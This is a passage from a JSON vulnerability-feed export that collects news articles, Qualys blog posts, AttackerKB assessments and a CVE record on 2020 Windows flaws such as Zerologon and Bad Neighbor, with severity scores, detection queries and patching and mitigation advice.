[said](<https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/>). \"While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T07:47:00", "type": "thn", "title": "US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-13T08:16:41", "id": "THN:A30AE10A13D33189456EB192DDF2B8C2", "href": "https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:07", "description": "[](<https://thehackernews.com/images/-OmeZzerf_N4/X3NtaoiyhdI/AAAAAAAAAi8/u8cq1mrPXdgdsFqdMJ1DsNqrUiSeIC0bQCLcBGAsYHQ/s728/webinar.jpg>)\n\n \nI am sure that many of you have by now heard of a recently disclosed critical Windows server vulnerability\u2014called [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>)\u2014that could let hackers completely take over enterprise networks.\n\nFor those unaware, in brief, all supported versions of the Windows Server operating systems are vulnerable to a critical privilege escalation bug that resides in the [Netlogon Remote Control](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) Protocol for Domain Controllers.\n\nIn other words, the underlying vulnerability ([CVE-2020-1472](<https://www.secura.com/pathtoimg.php?id=2055>)) could be exploited by an attacker to compromise Active Directory services, and eventually, the Windows domain without requiring any authentication.\n\nWhat's worse is that a proof-of-concept exploit for this flaw was released to the public last week, and immediately after, attackers started exploiting the weakness against unpatched systems in the wild.\n\n[](<https://thehackernews.com/images/-LlDoRgABjaM/X3NtIHP8GkI/AAAAAAAAAi0/5IgY1LPymBsVm0FHNJsBkmUWqgqC1c-UACLcBGAsYHQ/s0/zerologon.jpg>)\n\nAs described in our [coverage](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) based on a technical analysis published by Cynet security researchers, the underlying issue is Microsoft's implementation of AES-CFB8, where it failed to use unique, random salts for these Netlogon messages.\n\nThe attacker needs to send a specially crafted string of zeros in Netlogon messages to change the domain controller's password stored in the Active Directory.\n\nFor THN readers willing to learn more about this threat in detail, including technical information, mitigations, and detection techniques, they should join a live webinar ([register here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>)) with Aviad Hasnis, CTO at Cynet.\n\nThe free cybersecurity educational webinar is scheduled for September 30th at 5:00 PM GMT, and also aims to discuss exploits deployed in the wild to take advantage of this vulnerability.\n\nBesides this, the Cynet team has also released a free detection tool that alerts you to any Zerologon exploitation in your environment.\n\n[Register for the live webinar here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T17:26:00", "type": "thn", "title": "LIVE Webinar on Zerologon Vulnerability: Technical Analysis and Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-29T17:26:49", "id": "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "href": "https://thehackernews.com/2020/09/zerologon-cybersecurity.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-21T10:01:47", "description": "This month\u2019s Microsoft Patch Tuesday addresses 87 vulnerabilities with 11 of them labeled as Critical. The 11 Critical vulnerabilities cover TCP/IP Stack, SharePoint, Windows Camera Codec Pack, Graphics and several other workstation vulnerabilities. Adobe issued patches today for Adobe Flash Player.\n\n### Workstation Patches\n\nContinuing the trend, today\u2019s Patch Tuesday fixes many vulnerabilities that impact workstations. The Windows Camera Codec, GDI+, Browser, Hyper-V, Outlook, Media Foundation and Graphics components vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Windows TCP/IP RCE\n\nAn extremely critical Remote Code Execution vulnerability ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) is fixed today. Microsoft ranks this vulnerability as \u201cExploitation More Likely,\u201d and according to Microsoft and the [researchers at McAfee](<https://github.com/advanced-threat-research/CVE-2020-16898>), the vulnerability is wormable. It is highly recommended to prioritize these patches on all Windows 10, including Microsoft DNS Servers.\n\nThis vulnerability allows attackers to take complete control over Windows systems by sending malicious ICMPv6 Router Advertisement packets to vulnerable systems.\n\n### SharePoint RCE\n\nTwo remote code execution vulnerabilities ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>), [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)) are patched in Sharepoint Server that would allow an authenticated user on a guest system to perform security actions for an application pool process. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all SharePoint servers.\n\n### Graphics RCE\n\nA remote code execution vulnerability [CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>) is patched in the Graphics component that could be exploited once a user opens a specially crafted file. Based on the information given, this should be prioritized across all Windows servers and workstations.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb20-58.html>). The patches for Flash Player are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>).", "cvss3": {}, "published": "2020-10-13T18:52:03", "type": "qualysblog", "title": "October 2020 Patch Tuesday \u2013 87 Vulnerabilities, 11 Critical, SharePoint, TCP/IP Stack, Graphics, Adobe Vulns", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-16898", "CVE-2020-16923", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-13T18:52:03", "id": "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-28T04:15:50", "description": "On October 13, 2020, Microsoft fixed a critical remote code execution vulnerability in the Windows TCP/IP stack for handling ICMPv6 Router Advertisement packets. While Microsoft ranks this vulnerability as \u201cExploitation More Likely,\u201d we may see a proof-of-concept released soon. The security issue has received a critical severity rating score of 9.8 based on the CVSS v3 scoring system. \n\n#### Vulnerability Details:\n\n[McAfee Advanced Threat Research](<https://github.com/advanced-threat-research/CVE-2020-16898>) released a test script to demonstrate Denial of Service that causes immediate BSOD (Blue Screen of Death); however, it could potentially lead to remote code execution and is capable of being weaponized into a chain reaction allowing attacks to spread from one vulnerable machine to another (wormable).\n\nIPv6 router advertisement packet with a RDNSS (Recursive DNS Server) option, if maliciously crafted, can remotely trigger tcpip.sys file of Windows OS, leading to a DoS attack. The vulnerability occurs due to parsing ICMPv6 messages incorrectly by _tcpip.sys_ driver. The logical flaw in _tcpip.sys_ can be exploited into buffer overflow by adding more bytes to memory stack. As the vulnerability lies within the router advertisement packet of ICMPv6 Neighbor Discovery Protocol, it is also known as \u201cBad Neighbor.\u201d\n\n#### Affected products:\n\n * Windows 10 Version 1709 \n * Windows 10 Version 1803\n * Windows 10 Version 1809\n * Windows 10 Version 1903 \n * Windows 10 Version 1909\n * Windows 10 Version 2004 \n * Windows Server 2019\n\nA complete list of affected devices is available on Microsoft\u2019s October 2020 [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`operatingSystem: \"Windows 10\" OR operatingSystem: \"Windows Server 2019\"`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 &quot;CVE-2020-16898&quot;. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover TCP/IP Stack &quot;CVE-2020-16898&quot; Vulnerability\n\nNow that hosts with CVE-2020-16898 are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows TCP/IP Stack vulnerability based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018CVE-2020-16898\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91686`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91686 is available in signature version VULNSIGS-2.5.6-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.6.3-2 and above.\n\nAlong with the QID 91686, Qualys released IG QID 45468 to help customers track assets on which &quot;ICMPv6 RDNSS&quot; is disabled in the Windows TCP/IP settings. \n\n_`QID 45468 : Microsoft Windows TCP/IP ICMPv6 RDNSS Disabled`_\n\nUsing VMDR, the Windows TCP/IP Stack vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Easy Exploit\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Bad Neighbor threat feed to see the vulnerability and impacted host details. \n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201ccve: CVE-2020-16898\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 CVE-2020-16898. \n\n\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n**Configuration management adds context to overall vulnerability management ** \n \nWith [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover the status of RA (Router Advertisement) based DNS Configuration Setting. \n\n * Qualys Control ID \u2013 19571 \u201cStatus of the \u2018RA Based DNS Config (RFC 6106)\u2019 parameter of network interface\u201d would be evaluated to check the status of RA Based DNS Config is disabled in the result section as shown below: \n\n\n * \n\n### Mitigation\n\nAs per the advisory, the following mitigations should be done apart from patching the installments:\n\n * Disable ICMPv6 RDNSS. (only available for Windows 1709 and above.)\n \n \n _netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable_\n\n * Additionally, ICMPv6 Router Advertisements can be blocked or dropped at the network perimeter.\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s October 2020 [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) mentioned above. \n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Windows TCP/IP Stack RCE vulnerability CVE-2020-16898.\n\n### **References**\n\n<https://github.com/advanced-threat-research/CVE-2020-16898>\n\n<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>", "cvss3": {}, "published": "2020-10-14T20:28:33", "type": "qualysblog", "title": "Microsoft Windows TCP/IP Remote Code Execution Vulnerability (CVE-2020-16898) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-14T20:28:33", "id": "QUALYSBLOG:7799BDEDC6C56E9CAE494D08410C252D", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-02T12:43:58", "description": "**Update October 1, 2020**: Microsoft has [added step-by-step Zerologon patching instructions ](<https://www.databreachtoday.com/microsoft-issues-updated-patching-directions-for-zerologon-a-15090>)because the original instructions &quot;proved confusing to users and may have caused issues with other business operations.&quot;\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later. \n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\n**Update Sept 24, 2020**: Microsoft is detecting [active attacks leveraging the Zerologon vulnerability](<https://www.zdnet.com/article/microsoft-says-it-detected-active-attacks-leveraging-zerologon-vulnerability/>). Security teams are advised to patch vulnerable systems immediately.\n\nOn Sept 11, 2020, A Dutch team, collectively known as Secura, published an [exploit](<https://github.com/SecuraBV/CVE-2020-1472>) on how an unauthenticated remote user can take control over the domain controller and leverage admin privileges. The vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) received the maximum severity rating score of 10.0 based on CVSS v3 Scoring system.\n\nThe prime elements of this vulnerability are the weak encryption standards and the authentication process used in the Netlogon protocol. As new Windows Domain Controllers use standard AES-256 as encryption standards, incorrect use of the AES mode results in spoofing the identity of any computer (DC) account and replace it with all zeroes or empty passwords. As the final output replaces all characters of the password with zeroes, this bug is also well-known as \u201cZerologon\u201d.\n\n**Affected Products**\n\n * Windows Servers 2008\n * Windows Servers 2012 R2\n * Windows Servers 2016\n * Windows Servers 2019\n\nA complete list of affected devices is available on Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`(operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 &quot;Zerologon&quot;. This helps in automatically grouping existing hosts with Zerologon as well as any new Windows server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover Zerologon &quot;CVE-2020-1472&quot; Vulnerability\n\nNow that hosts with Zerologon are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Zerologon based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Zerologon\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91668`_\n\nOR you could modify your search to :\n\n_`Vulnerability - vulnerabilities.vulnerability.qid:91668`_\n\n_`Asset - (operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91668 is available in signature version VULNSIGS-2.4.958-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.958.3-2 and above.\n\nAlong with the QID 91668, Qualys released the following IG QID 45461 to help customers track domain controller assets on which netlogon secure channel mode is enabled. This QID can be detected using authenticated scanning using VULNSIGS-2.4.986-3 and above or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.986.3-2 and above. \n\n_`QID 45461 : Microsoft Windows Domain Controller Netlogon Secure Channel Enforcement Mode Enabled`_\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later.\n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\nPlease Note: We have tested the QID across Qualys lab environment on a variety of Windows versions, and we have not observed any issues. In case you experience issues with the remote detection, please reach out to Qualys Support for immediate attention.\n\nUsing VMDR, the Zerologon vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Exploit Public\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Zerologon threat feed to see the vulnerability and impacted host details. \n\nWith VMDR Dashboard, you can track Zerologon, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of Zerologon vulnerability trends in your environment using [Zerologon Dashboard Link](<https://qualys-secure.force.com/customer/s/article/000006405>).\n\n\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 91668\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Zerologon. \n\n\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n### Solution\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) mentioned above. For Windows devices, a patch to be published in Feb 2021 would place Domain controllers in enforcement mode; to explicitly allow the account by adding an exception for any non-compliant device.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Zerologon vulnerability CVE-2020-1472.\n\n### **References**\n\n<https://www.secura.com/pathtoimg.php?id=2055>\n\n<https://github.com/SecuraBV/CVE-2020-1472>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>", "cvss3": {}, "published": "2020-09-15T19:55:08", "type": "qualysblog", "title": "Microsoft Netlogon Vulnerability (CVE-2020-1472 \u2013 Zerologon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-15T19:55:08", "id": "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-10-04T22:45:06", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\n**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-22T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities/rapid7-analysis", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T05:28:50", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at October 15, 2020 10:48pm UTC reported:\n\nThere\u2019s high attacker value here if an attacker A) wants to cause a little mayhem, and/or B) can actually turn the DoS into reliable RCE. The first option is probably the likelier outcome in the immediate future. If [Positive Technologies](<https://twitter.com/ptswarm/status/1316838270538575877>) or Tripwire releases a PoC, the likelihood of broad exploitation probably rises significantly. For now, \u201cpatch fast but don\u2019t panic\u201d is good advice, as it always is with VPNs. There\u2019s full analysis for this bug in the [Rapid7 Analysis tab here](<https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135#rapid7-analysis>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-5135", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-28T00:00:00", "id": "AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "href": "https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-29T18:04:27", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka \u2018Netlogon Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-16T00:00:00", "id": "AKB:71F77351-1AE5-4161-8836-D26680828466", "href": "https://attackerkb.com/topics/KzT7uN3Bx8/cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:27:41", "description": "A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka 'Windows Camera Codec Pack Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16968.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16967", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16967", "CVE-2020-16968"], "modified": "2021-07-21T11:39:00", "cpe": 